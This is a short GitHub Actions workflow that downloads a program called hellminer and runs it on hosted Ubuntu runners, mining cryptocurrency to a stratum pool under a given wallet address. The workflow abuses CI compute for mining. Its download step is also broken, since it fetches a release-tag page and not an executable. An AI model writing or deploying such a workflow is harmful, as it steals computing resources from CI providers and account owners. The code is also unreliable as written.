name: Hellminer

on:
  workflow_dispatch:

jobs:
  mine:
    runs-on: ubuntu-latest
    steps:
    - name: Download Hellminer
      run: |
        wget https://github.com/hellcatz/hminer/releases/tag/v0.59.1
        chmod +x hellminer

    - name: Start Mining
      run: |
        ./hellminer -c stratum+tcp://sg.vipor.net:5040#xnsub -u RDuuJMW7LLCSwRExPtQmqBb3TJeNtjxtqL.docker -p x --cpu1
